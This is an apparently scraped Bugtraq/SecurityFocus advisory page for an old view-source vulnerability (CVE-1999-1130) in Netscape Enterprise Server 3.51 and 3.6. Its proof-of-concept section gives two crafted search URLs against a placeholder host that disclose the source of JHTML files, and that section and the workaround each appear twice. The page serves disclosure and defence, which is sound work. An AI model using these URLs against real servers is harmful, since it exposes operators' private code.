Netscape Enterpise Server JHTML View Source Vulnerability
BID:559
Info
Netscape Enterpise Server JHTML View Source Vulnerability
| Bugtraq ID: | 559 |
| Class: | Design Error |
| CVE: |
CVE-1999-1130 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Jul 30 1999 12:00AM |
| Updated: | Jul 11 2009 12:56AM |
| Credit: | Vulnerability posted to Bugtraq July 30, 1999 by David Litchfield <[email protected]>. |
| Vulnerable: |
Netscape Enterprise Server 3.51 Netscape Enterprise Server 3.6 |
| Not Vulnerable: | |
Exploit / POC
Netscape Enterpise Server JHTML View Source Vulnerability
These example URLs may be wrapped for readability: (copied verbatim from David Litchfield's post to Bugtraq)
h t t p://no-such-server/search?NS-search-page=results&NS-query=A&NS-collection=B&NS-tocrec-pat=/text/HTML-tocrec-demo1.pat
where A is the query e.g. the word "that" and B is the collection e.g. "Web+Publish" or "web_htm".
-OR-
h t t p://no-such-server/search?NS-search-page=document&NS-rel-doc-name=/path/to/indexed/file.jhtml&NS-query=URI!=''&NS-collection=A
where A is the collection without having to go through the rigmarole of playing around with HTML-tocrec-demo1.pat in the URL.
These example URLs may be wrapped for readability: (copied verbatim from David Litchfield's post to Bugtraq)
h t t p://no-such-server/search?NS-search-page=results&NS-query=A&NS-collection=B&NS-tocrec-pat=/text/HTML-tocrec-demo1.pat
where A is the query e.g. the word "that" and B is the collection e.g. "Web+Publish" or "web_htm".
-OR-
h t t p://no-such-server/search?NS-search-page=document&NS-rel-doc-name=/path/to/indexed/file.jhtml&NS-query=URI!=''&NS-collection=A
where A is the collection without having to go through the rigmarole of playing around with HTML-tocrec-demo1.pat in the URL.
Solution / Fix
Netscape Enterpise Server JHTML View Source Vulnerability
Solution:
A work-around is to keep all active content in an unindexed directory, and if you do not explicitly require the search engine functionality it should be disabled.
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
A work-around is to keep all active content in an unindexed directory, and if you do not explicitly require the search engine functionality it should be disabled.
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Netscape Enterpise Server JHTML View Source Vulnerability
References:
References: